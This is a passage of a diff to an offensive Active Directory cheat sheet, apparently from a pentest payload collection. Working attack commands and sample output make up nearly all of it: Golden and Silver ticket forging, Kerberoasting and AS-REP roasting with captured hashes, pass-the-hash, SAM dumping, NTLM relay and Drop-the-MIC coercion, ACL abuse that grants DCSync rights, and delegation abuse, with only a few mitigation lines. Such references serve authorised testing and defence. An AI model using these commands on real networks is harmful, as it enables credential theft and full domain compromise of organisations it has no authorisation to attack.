+Forging a TGT require the krbtgt NTLM hash
+
+> The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt ntlm hash must be used.
+
+#### Using Mimikatz
+
+```powershell
+# Get info - Mimikatz
 lsadump::dcsync /user:krbtgt
 lsadump::lsa /inject /name:krbtgt
 
-Forge a Golden ticket - Mimikatz
+# Forge a Golden ticket - Mimikatz
 kerberos::purge
 kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
 kerberos::tgt
 ```
 
-Meterpreter version
+#### Using Meterpreter 
 
 ```powershell
-Get info - Meterpreter(kiwi)
+# Get info - Meterpreter(kiwi)
 dcsync_ntlm krbtgt
 dcsync krbtgt
 
-Forge a Golden ticket - Meterpreter
+# Forge a Golden ticket - Meterpreter
 load kiwi
 golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>
 golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
@@ -351,51 +639,58 @@ kerberos_ticket_use /root/Downloads/pentestlabuser.tck
 kerberos_ticket_list
 ```
 
-Using a ticket on Linux
+#### Using a ticket on Linux
 
 ```powershell
-Convert the ticket kirbi to ccache with kekeo
+# Convert the ticket kirbi to ccache with kekeo
 misc::convert ccache ticket.kirbi
 
-Alternatively you can use ticketer from Impacket
+# Alternatively you can use ticketer from Impacket
 ./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da
 
 ticketer.py -nthash HASHKRBTGT -domain-sid SID_DOMAIN_A -domain DEV Administrator -extra-sid SID_DOMAIN_B_ENTERPRISE_519
 ./ticketer.py -nthash e65b41757ea496c2c60e82c05ba8b373 -domain-sid S-1-5-21-354401377-2576014548-1758765946 -domain DEV Administrator -extra-sid S-1-5-21-2992845451-2057077057-2526624608-519
 
-
 export KRB5CCNAME=/home/user/ticket.ccache
 cat $KRB5CCNAME
 
-
-NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file
+# NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file
 ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 
 ```
 
-### PassTheTicket Silver Tickets
-
-Forging a TGS require machine accound password (key) from the KDC
+If you need to swap ticket between Windows and Linux, you need to convert them with `ticket_converter` or `kekeo`.
 
 ```powershell
-Create a ticket for the service
-kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
-/kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt
-
-Then use the same steps as a Golden ticket
-misc::convert ccache ticket.kirbi
-export KRB5CCNAME=/home/user/ticket.ccache
-./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 
+root@kali:ticket_converter$ python ticket_converter.py velociraptor.ccache velociraptor.kirbi
+Converting ccache => kirbi
+root@kali:ticket_converter$ python ticket_converter.py velociraptor.kirbi velociraptor.ccache
+Converting kirbi => ccache
 ```
 
-### Trust Tickets
+### Pass-the-Ticket Silver Tickets
 
-TODO
+Forging a TGS require machine accound password (key) or NTLM hash from the KDC
 
-### Kerberoast
+```powershell
+# Create a ticket for the service
+mimikatz $ kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
+
+# Examples
+mimikatz $ /kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt
+mimikatz $ kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park
+
+# Then use the same steps as a Golden ticket
+mimikatz $ misc::convert ccache ticket.kirbi
+
+root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache
+root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 
+```
+
+### Kerberoasting
 
 > "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
 
-Any valid domain user can request a kerberos ticket for any domain service with `GetUserSPNs`. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
+Any valid domain user can request a kerberos ticket (TGS) for any domain service with `GetUserSPNs`. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
 
 ```powershell
 $ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
@@ -409,6 +704,18 @@ active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=
 $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43c360c29c154b012c$c54c7be163ae6c323ae6b5fc45a1eacee2f4903deec785cd689f4551e023775c7e7772fe85e3fb8374ca95534d72c971ba80e8b6d4ef3c3b8439dc54031540133cbcbd5f7b39d622733d198eec594c0cd181ab4696a6ad12744d1ddd2d3e2c6dd33b4daedbc9cae75e8ff2652c80421b0fa3a61ddf2cabeea462c44e0f6d9a6436717e0621bb4e0fe8bd3cf36156b4b2f7b81d651f70baf34a0b3071858b5034b895c25a0d3c67044c849d5952c381a0078a86ae562810a93d9c7bcc8311255cc9eda35a9c4d4d43ff1cc29108056285c954f3c633332ff0cb0c9c0f1896c792b247c8d25f5dd71802728fc99bb22709337b5596ab0e2045110b0b005b03351e9f71a65b48e8259f6191ce95d4e5794846c61c3abccf0f5f72a8679fb0dc0777720f5551ad99c9c9ab0955f85ee211d40b01fcaece7868960b2063923aa0f59e17b347f3308087707e95cad54b9df8179728821cf54cb204c5c2e571d9a66c8ec40b090305aa32e90a90d25ea37be6d8f8a83c683a8b69d386f9edb970596bc56fa02971f69c7e073b8de1213d9caa75ab652e5c5b99cadace9dd7d15d1d530309ea39ca1b7c6009ae3342796a6bdea084622ee95cbade437659e37363b848bad2186e3a9f7dec66e1e496db32d55eda8fb926f057996638646dcc662ed226788ddf36304dc70eaca91b26cb7180341f417fad91117ee10212c69423abd42769cbf891b51d736ffe474899eec8df64abef319d3c6dc379f2bfda33de7c3a1a50d6ece564d4559c77f560b7506fa2f1c9af7162f1247ea35706aafffde48b8cc48b1ec8e99d99ac81dc02f55f43f9726d746383cd076e7199070ff8100846ba9dc2235e92d0c7dac1f33da5fe7901e02f0566030d7c7e02535d6a300292a04e6c32d0d74d37679c2617750f5920d9c697a30c883519bc6b5a916eec354459c7f248c783bd79c436a7e8c463a8981a9e000d21c2d00c7e8468cff0ab695cb3aa4f14f149d1fafb4d656bcd1f67b747fc4c2d648466a386774853db8d50c22df57e747085142f98f5f06191c243b9dbf671da64228364f058c7e2e53a80fdde7f6dc2f25459a09fb2583757953247c222d64f49bc12d461d2e5aa572ceba2605d7eafd6031405ee422ac35cbf041b4fd28e58d871406e053d1a806de49056791646c175bf0d2aaa19f844bfc885520e19c391702be6ae61122fceac32b689764334908a4eaf7c69974a9519ebb068a15c087955fb402416bd184fd2
 ```
 
+Alternatively with [Rubeus](https://github.com/GhostPack/Rubeus)
+
+```powershell
+.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt
+```
+
+Alternatively on macOS machine you can use [bifrost](https://github.com/its-a-feature/bifrost)
+
+```powershell
+./bifrost -action asktgs -ticket doIF<...snip...>QUw= -service host/dc1-lab.lab.local -kerberoast true
+```
+
 Then crack the ticket with hashcat or john
 
 ```powershell
@@ -416,13 +723,20 @@ hashcat -m 13100 -a 0 hash.txt crackstation.txt
 ./john ~/hash.txt --wordlist=rockyou.lst
 ```
 
+Mitigations: 
+* Have a very long password for your accounts with SPNs (> 25 characters)
+* Make sure no users have SPNs
+
 ### KRB_AS_REP Roasting
 
 If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
 
+Prerequisite:
+- Accounts have to have **DONT_REQ_PREAUTH**
+
 ```powershell
 C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
-C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user
+C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast
 
  ______        _
 (_____ \      | |
@@ -450,11 +764,31 @@ v1.3.4
 [*] AS-REP hash:
 
     $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...
+
+C:\Rubeus> john --wordlist=passwords_kerb.txt hashes.asreproast
+```
+
+Using `impacket` to get the hash and `hashcat` to crack it.
+
+```powershell
+# example
+$ python GetNPUsers.py htb.local/svc-alfresco -no-pass
+Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
+
+[*] Getting TGT for svc-alfresco
+$krb5asrep$23$svc-alfresco@HTB.LOCAL:c13528009a59be0a634bb9b8e84c88ee$cb8e87d02bd0ac7ae561334cd58a56af90f7fbb20bbd4493b6754a57d5ebc08cb7f47ea472ebb7c9ba4260f57c11b664be03191550254e5c77a17518aeabc55f9321bd9f52201df820e130aa0e3f4b0986725fd3a14794433881050eb62d384c4058a407a348a7de2ef0767a99c9df4f85d8eba8ce30a4ad59621c51f8ea8c0d33f33e06bea1d8ff28d7a86fc2010fd7fa45d2fcc2178cb13c1006823aec8a5da10cffcceeb6e978754b0d4976df5cccb4beb9776d5a8f4810153ccc0e1237ec74e6ae61402457c6cfe29bca7c2f62b287f13aff063f5a0a21c728581e43b46d7537b3e776b4
+
+# extract hashes
+root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
+root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
+
+# crack AS_REP messages
+root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 
 ```
 
 ### Pass-the-Hash
 
-The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes.
+The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500.
 
 ```powershell
 use exploit/windows/smb/psexec
@@ -466,36 +800,62 @@ set SMBPass nastyCutt3r
 set PAYLOAD windows/meterpreter/bind_tcp
 run
 shell
+```
 
 or with crackmapexec
+
+```powershell
 cme smb 10.2.0.2 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"
 also works with net range : cme smb 10.2.0.2/24 ... 
+```
 
 or with psexec
+
+```powershell
 proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d
+```
 
 or with the builtin Windows RDP and mimikatz
+```powershell
 sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:"mstsc.exe /restrictedadmin"
 ```
 
-### OverPass-the-Hash (pass the key)
-
-Request a TGT with only the NT hash
+You can extract the local SAM database to find the local administrator hash :
 
 ```powershell
-Using impacket
-./getTGT.py -hashes :1a59bd44fe5bec39c44c8cd3524dee lab.ropnop.com
-chmod 600 tgwynn.ccache
+C:\> reg.exe save hklm\sam c:\temp\sam.save
+C:\> reg.exe save hklm\security c:\temp\security.save
+C:\> reg.exe save hklm\system c:\temp\system.save
+$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
+```
+
+
+### OverPass-the-Hash (pass the key)
+
+Request a TGT with only the NT hash then you can connect to the machine using the TGT.
+
+#### Using impacket
+
+```powershell
+root@kali:impacket-examples$ python ./getTGT.py -hashes :1a59bd44fe5bec39c44c8cd3524dee lab.ropnop.com
+root@kali:impacket-examples$ export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
+root@kali:impacket-examples$ python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
 
 also with the AES Key if you have it
-./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com
-
+root@kali:impacket-examples$ ./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com
 
 ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
 kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
 klist
 ```
 
+#### Using Rubeus
+
+```powershell
+C:\Users\triceratops>.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
+C:\Users\triceratops>.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
+```
+
 ### Capturing and cracking NTLMv2 hashes
 
 If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.
@@ -512,15 +872,138 @@ hashcat -m 5600 -a 0 hash.txt crackstation.txt
 
 ### NTLMv2 hashes relaying
 
+NTLMv1 and NTLMv2 can be relayed to connect to another machine.
+
+| Hash                 | Hashcat | Attack method       |
+|---|---|---|
+| LM                    | 3000  | crack/pass the hash  |
+| NTLM/NTHash           | 1000  | crack/pass the hash  |
+| NTLMv1/Net-NTLMv1     | 5500  | crack/relay attack   |
+| NTLMv2/Net-NTLMv2     | 5600  | crack/relay attack   |
+
+#### MS08-068 NTLM reflection
+
+NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008.
+
+> This vulnerability allows an attacker to redirect an incoming SMB connection back to the machine it came from and then access the victim machine using the victim’s own credentials.
+
+* https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS08-068
+
+```powershell
+msf > use exploit/windows/smb/smb_relay
+msf exploit(smb_relay) > show targets
+```
+
+#### SMB Signing Disabled and IPv4
+
 If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine.
 
 1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`.
+    ```powershell
+    [Responder Core]
+    ; Servers to start
+    ...
+    SMB = Off     # Turn this off
+    HTTP = Off    # Turn this off
+    ```
 2. Run `python  RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`.
 3. Run `python Responder.py -I <interface_card>` and `python MultiRelay.py -t <target_machine_IP> -u ALL`
-4. Wait for a shell
+4. Also you can use `ntlmrelayx` to dump the SAM database of the targets in the list. 
+    ```powershell
+    ntlmrelayx.py -tf targets.txt
+    ```
+5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions.
+    ```powershell
+    $ ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support
+    [*] Servers started, waiting for connections
+    Type help for list of commands
+    ntlmrelayx> socks
+    Protocol  Target          Username                  Port
+    --------  --------------  ------------------------  ----
+    MSSQL     192.168.48.230  VULNERABLE/ADMINISTRATOR  1433
+    SMB       192.168.48.230  CONTOSO/NORMALUSER1       445
+    MSSQL     192.168.48.230  CONTOSO/NORMALUSER1       1433
+    
+    $ proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1
+    $ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth
+    ```
+
+Mitigations:
+
+ * Disable LLMNR via group policy
+    ```powershell
+    Open gpedit.msc and navigate to Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution and set to Enabled
+    ```
+ * Disable NBT-NS
+    ```powershell
+    This can be achieved by navigating through the GUI to Network card > Properties > IPv4 > Advanced > WINS and then under "NetBIOS setting" select Disable NetBIOS over TCP/IP
+    ```
+
+#### SMB Signing Disabled and IPv6
+
+Since MS16-077 the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS.
+
+```powershell
+cme smb $hosts --gen-relay-list relay.txt
+
+# DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6
+mitm6 -i eth0 -d $domain
+
+# spoofing WPAD and relaying NTLM credentials
+ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
+or 
+ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug
+```
+
+#### Drop the MIC
+
+> The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP
+
+Check vulnerability with [cve-2019-1040-scanner](https://github.com/fox-it/cve-2019-1040-scanner)
+
+```powershell
+python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
+[*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth
+[*] Target TARGET is not vulnerable to CVE-2019-1040 (authentication was rejected)
+```
+
+- Using any AD account, connect over SMB to a victim Exchange server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant DCSync privileges to the attacker account. The attacker account can now use DCSync to dump all password hashes in AD
+    ```powershell
+    TERM1> python printerbug.py testsegment.local/testuser@s2012exc.testsegment.local <attacker ip/hostname>
+    TERM2> ntlmrelayx.py --remove-mic --escalate-user ntu -t ldap://s2016dc.testsegment.local -smb2support
+    TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc
+    ```
+
+
+- Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server.
+    ```powershell
+    # create a new machine account
+    TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support 
+    TERM2> python printerbug.py relaytest.local/testuser@second-dc-server 10.0.2.6
+    TERM1> getST.py -spn host/second-dc-server.local 'relaytest.local/MACHINE$:PASSWORD' -impersonate DOMAIN_ADMIN_USER_NAME
+
+    # connect using the ticket
+    export KRB5CCNAME=DOMAIN_ADMIN_USER_NAME.ccache
+    secretsdump.py -k -no-pass second-dc-server.local -just-dc
+    ```
+
+#### Ghost Potato - CVE-2019-1384
+
+Prerequisites:
+* User must be a member of the local Administrators group
+* User must be a member of the Backup Operators group
+* Token must be elevated
+
+Using a modified version of ntlmrelayx : https://shenaniganslabs.io/files/impacket-ghostpotato.zip
+
+```powershell
+ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe
+```
 
 ### Dangerous Built-in Groups Usage
 
+If you do not want modified ACLs to be overwrite every hour, you should change ACL template on the object "CN=AdminSDHolder,CN=System," or set "adminCount" attribute to 0 for the required objec
+
 AdminSDHolder
 
 ```powershell
@@ -530,8 +1013,51 @@ or
 ([adsisearcher]"(AdminCount=1)").findall()
 ```
 
+#### AdminSDHolder Abuse
+if you modify the permissions of AdminSDHolder, that permission template will be pushed out to all protected accounts automatically by SDProp
+
+```powershell
+# right to reset password for toto using the account titi
+Add-ObjectACL -TargetSamAccountName toto -PrincipalSamAccountName titi -Rights ResetPassword
+# give all rights
+Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName toto -Verbose -Rights All
+```
+
+
+### Abusing Active Directory ACLs/ACEs
+
+* **GenericAll on User** : We can reset user's password without knowing the current password
+* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : `net group "domain admins" spotless /add /domain`
+* **WriteProperty on Group** : We can again add ourselves to the Domain Admins group and escalate privileges: `net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain`
+* **Self (Self-Membership) on Group** : Another privilege that enables the attacker adding themselves to a group
+* **ForceChangePassword** : we can reset the user's password without knowing their current password: `$c = Get-Credential;Set-DomainUserPassword -Identity changeme -AccountPassword $c.Password -Verbose` 
+* **GenericWrite on User** : WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1`
+* **WriteDACL** : It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'testuser' -Domain 'xenoflux.local' -Password 'Welcome01!'`
+    ```powershell
+    # give DCSync right to titi
+    Add-ObjectACL -TargetDistinguishedName "dc=dev,dc=testlab,dc=local" -PrincipalSamAccountName titi -Rights DCSync
+    ```
+
+Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner).
+
+```powershell
+ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show
+```
+
+
 ### Trust relationship between domains
 
+* One-way
+  * Domain B trusts A
+  * Users in Domain A can access resources in Domain B
+  * Users in Domain B cannot access resources in Domain A
+* Two-way
+  * Domain A trusts Domain B
+  * Domain B trusts Domain A
+  * Authentication requests can be passed between the two domains in both directions
+
+#### Enumerate trusts between domains
+
 ```powershell
 nltest /trusted_domains
 ```
@@ -546,90 +1072,503 @@ SourceName          TargetName                    TrustType      TrustDirection
 domainA.local      domainB.local                  TreeRoot       Bidirectional
 ```
 
+#### Exploit trusts between domains
+
+:warning: Require a Domain-Admin level access to the current domain.
+
+| Source     | Target  | Technique to use  | Trust relationship  |
+|---|---|---|---|
+| Root      | Child  | Golden Ticket + Enterprise Admin group (Mimikatz /groups) | Inter Realm (2-way)  |
+| Child     | Child  | SID History exploitation (Mimikatz /sids)                 | Inter Realm Parent-Child (2-way)  |
+| Child     | Root   | SID History exploitation (Mimikatz /sids)                 | Inter Realm Tree-Root (2-way)  |
+| Forest A  | Forest B  | PrinterBug + Unconstrained delegation ?  | Inter Realm Forest or External (2-way)  |
+
+
+
+### Child Domain to Forest Compromise - SID Hijacking
+
+Most trees are linked with dual sided trust relationships to allow for sharing of resources.
+By default the first domain created if the Forest Root.
+
+Prerequisite: 
+- KRBTGT Hash
+
+- Find the SID of the domain
+    ```powershell
+    $ Convert-NameToSid target.domain.com\krbtgt
+    S-1-5-21-2941561648-383941485-1389968811-502
+
+    # with Impacket
+    lookupsid.py domain/user:password@10.10.10.10
+    ```
+- Replace 502 with 519 to represent Enterprise Admins
+- Create golden ticket and attack parent domain. 
+    ```powershell
+    kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt
+    ```
+
+### Kerberos Unconstrained Delegation
+
+> The user sends a TGS to access the service, along with their TGT, and then the service can use the user's TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html 
+
+:warning: Unconstrained delegation used to be the only option available in Windows 2000
+
+Domain Compromise via DC Print Server and Unconstrained Delegation
+
+Prerequisites:
+- Object with Property "Trust this computer for delegation to any service (Kerberos only)"
+- Must have ADS_UF_TRUSTED_FOR_DELEGATION 
+- Must not have ADS_UF_NOT_DELEGATED flag
+
+#### Find delegation
+
+Check the `TrustedForDelegation` property.
+
+```powershell
+# From https://github.com/samratashok/ADModule
+PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True}
+
+or 
+
+$> ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10   
+grep TRUSTED_FOR_DELEGATION domain_computers.grep
+```
+
+NOTE: Domain controllers usually have unconstrained delegation enabled
+
+#### Monitor with Rubeus
+
+Monitor incoming connections from Rubeus.
+
+```powershell
+Rubeus.exe monitor /interval:1 
+```
+
+#### Force a connect back from the DC
+
+>  SpoolSample is a PoC to coerce a Windows host to authenticate to an arbitrary server using a "feature" in the MS-RPRN RPC interface 
+
+```powershell
+# From https://github.com/leechristensen/SpoolSample
+.\SpoolSample.exe VICTIM-DC-NAME UNCONSTRAINED-SERVER-DC-NAME
+.\SpoolSample.exe DC01.HACKER.LAB HELPDESK.HACKER.LAB
+# DC01.HACKER.LAB is the domain controller we want to compromise
+# HELPDESK.HACKER.LAB is the machine with delegation enabled that we control.
+```
+
+If the attack worked you should get a TGT of the domain controller.
+
+#### Load the ticket
+
+Extract the base64 TGT from Rubeus output and load it to our current session.
+
+```powershell
+.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt
+```
+
+Alternatively you could also grab the ticket using Mimikatz :  `mimikatz # sekurlsa::tickets`
+
+Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HACKER\krbtgt`
+
+
+#### Mitigation
+
+* Ensure sensitive accounts cannot be delegated
+* Disable the Print Spooler Service
+
+### Kerberos Constrained Delegation
+
+> Request a Kerberos ticket which allows us to exploit delegation configurations, we can once again use Impackets getST.py script, however,
+
+Passing the -impersonate flag and specifying the user we wish to impersonate (any valid username).
+
+```powershell
+# Discover
+$ Get-DomainComputer -TrustedToAuth | select -exp dnshostname
+
+# Find the service 
+$ Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo
+
+# Exploit with Impacket
+$ getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10
+Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
+
+[*] Getting TGT for user
+[*] Impersonating Administrator
+[*]     Requesting S4U2self
+[*]     Requesting S4U2Proxy
+[*] Saving ticket in Administrator.ccache
+
+# Exploit with Rubeus
+$ rubeus s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
+```
+
+
+### Kerberos Resource Based Constrained Delegation
+
+Resource-based Constrained Delegation was introduced in Windows Server 2012. 
+
+> The user sends a TGS to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a TGS for the user to Service B.  https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
+
+1. Import **Powermad** and **Powerview**
+
+    ```powershell
+    PowerShell.exe -ExecutionPolicy Bypass
+    Import-Module .\powermad.ps1
+    Import-Module .\powerview.ps1
+    ```
+
+2. Get user SID
+
+    ```powershell
+    $AttackerSID = Get-DomainUser SvcJoinComputerToDom -Properties objectsid | Select -Expand objectsid
+    $ACE = Get-DomainObjectACL dc01-ww2.factory.lan | ?{$_.SecurityIdentifier -match $AttackerSID}
+    $ACE
+    ConvertFrom-SID $ACE.SecurityIdentifier
+    ```
+
+3. Abuse **MachineAccountQuota** to create a computer account and set an SPN for it
+
+    ```powershell
+    New-MachineAccount -MachineAccount swktest -Password $(ConvertTo-SecureString 'Weakest123*' -AsPlainText -Force)
+    ```
+
+4. Rewrite DC's **AllowedToActOnBehalfOfOtherIdentity** properties
+
+    ```powershell
+    $ComputerSid = Get-DomainComputer swktest -Properties objectsid | Select -Expand objectsid
+
+    $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
+    $SDBytes = New-Object byte[] ($SD.BinaryLength)
+    $SD.GetBinaryForm($SDBytes, 0)
+    Get-DomainComputer dc01-ww2.factory.lan | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
+    $RawBytes = Get-DomainComputer dc01-ww2.factory.lan -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
+    $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
+    $Descriptor.DiscretionaryAcl
+    ```
+
+5. Use Rubeus to get hash from password
+
+    ```powershell
+    Rubeus.exe hash /password:'Weakest123*' /user:swktest  /domain:factory.lan
+    [*] Input password             : Weakest123*
+    [*] Input username             : swktest
+    [*] Input domain               : factory.lan
+    [*] Salt                       : FACTORY.LANswktest
+    [*]       rc4_hmac             : F8E064CA98539B735600714A1F1907DD
+    [*]       aes128_cts_hmac_sha1 : D45DEADECB703CFE3774F2AA20DB9498
+    [*]       aes256_cts_hmac_sha1 : 0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347
+    [*]       des_cbc_md5          : BA297CFD07E62A5E
+    ```
+
+6. Impersonate domain admin using our newly created machine account
+
+    ```powershell
+    .\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt
+
